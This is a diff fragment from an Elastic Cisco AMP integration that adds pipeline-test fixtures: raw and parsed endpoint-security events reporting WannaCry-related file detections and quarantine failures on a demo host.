+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843791900Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064601",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843793783Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064598",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843795681Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064600",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843806383Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064599",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 6404,
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843808566Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064597",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843810485Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064596",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log
new file mode 100644
index 00000000000..dc134052124
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log
@@ -0,0 +1,62 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
